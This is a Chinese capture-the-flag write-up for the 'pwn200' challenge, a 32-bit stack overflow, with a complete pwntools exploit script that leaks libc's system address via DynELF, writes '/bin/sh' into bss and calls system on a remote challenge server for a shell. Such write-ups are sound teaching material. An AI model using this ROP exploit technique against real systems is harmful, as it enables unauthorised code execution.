攻防世界 pwn200 WP
程序员文章站
2022-07-09 12:40:22
...
32位栈溢出程序
关于ROP:https://blog.csdn.net/Zarcs_233/article/details/103996634
具体思路(ROP):
1.搞到system函数地址,可以通过dynelf
2.写入’/bin/sh’,用做system参数
3.调用system函数
EXP:
from pwn import *
context.log_level='debug'
p=remote("111.198.29.45",30502)
start=0x80483D0 #程序起始代码,实现复用
def leak(addr):
write_addr=0x80483C0
payload='a'*112+p32(write_addr)+p32(start)+p32(1)+p32(addr)+p32(4) #rop调用write泄露
p.recvuntil("Welcome to XDCTF2015~!\n")
p.send(payload)
buff=p.recv(4)
return buff
dyn=DynELF(leak,elf=ELF("./bed0c68697f74e649f3e1c64ff7838b8"))
system=dyn.lookup("system","libc")
print("get system address:%X" % system)
def write():
bin="/bin/sh"
read_addr=0x8048390
bss=0x804A048
payload='a'*112+p32(read_addr)+p32(start)+p32(0)+p32(bss)+p32(8) #ROP读入/bin/sh
p.recvuntil("Welcome to XDCTF2015~!\n")
p.send(payload)
p.sendline(bin)
write()
payload='a'*112+p32(system)+p32(0)+p32(0x804A048) #ROP调用system获得shell
p.recvuntil("Welcome to XDCTF2015~!\n")
p.send(payload)
p.interactive()
这里由于是32位程序,参数直接存在stack中,所以可以直接构造栈帧,但是有一点需要注意,那就是bss,这里我没有直接使用bss开头,因为bss开头是stdin和stdout,而read之后跳转到start,程序会再次修改stdin和stdout的值。所以这里使用了bss结尾处的内存区域。
上一篇: 数据结构与算法-快速排序
下一篇: [wp] 攻防世界-web2